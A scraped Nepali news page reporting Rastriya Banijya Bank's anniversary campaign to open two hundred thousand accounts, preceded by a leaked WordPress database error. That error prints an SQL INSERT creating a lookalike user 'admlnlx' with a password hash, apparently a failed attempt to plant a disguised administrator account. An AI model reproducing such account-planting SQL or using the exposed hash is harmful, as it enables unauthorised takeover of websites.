WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BaAQRdD1Lpxb0SzoPbQ77FUBHhKsdE0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 13:53:03', '', 'admlnlx', 'admlnlx')
काठमान्डौं, माघ ६-
राष्ट्रिय वाणिज्य बैंकले एक वर्षभित्र दुई लाख नयाँ खाता खोल्न देशभरी अभियान सञ्चालन गर्ने भएको छ। बैंकले ५२ औं वार्षिकोत्सवको अवसर पारेर एक व्यक्ति एक बैंक खाता अभियान सुरु गर्न लागेको हो। बैंकले बिहीबार आयोजना गरेको पत्रकार सम्मेलनमा प्रमुख कार्यकारी अधिकृत किरणकुमार श्रेष्ठले देशभरका १ सय ७१ वटै शाखा कार्यालय परिचालन गरी एक वर्षमा दुई लाख खाता खोल्ने जानकारी दिए।
बैकले आफनो सेवालाई प्रभावकारी बनाउन १ सय ७१ वटा शाखा कार्यालय, ९० वटा एटिएम, १७ स्थानमा एक्सटेन्सन काउन्टर, ७५ स्थानमा शाखारहित बैंकिङ सेवा सञ्चालन गर्दै आएको छ। एटिएम सेवालाई भरपर्दो र विश्वसनीय बनाउन चिफ बेस्ट डेबिट कार्ड संचालनमा ल्याउने तयारी पनि गरेको छ। बैंकले शैक्षिक कर्जा, घर निर्माण, गाडी खरिद जस्ता उपभोग्य बस्तुहरुमा पनि कर्जा प्रवाह गर्दै आएको जानकारी दिएको छ। राष्ट्रिय वाणिज्य बैंक ५२ वर्ष अघि स्थापना गरिएको बैक हो। यसले माघ १० गते आफनो ५२ औं वार्षिक उत्सव कार्यक्रमलाई भव्यताका साथ मनाउने तयारी पनि गरेको छ।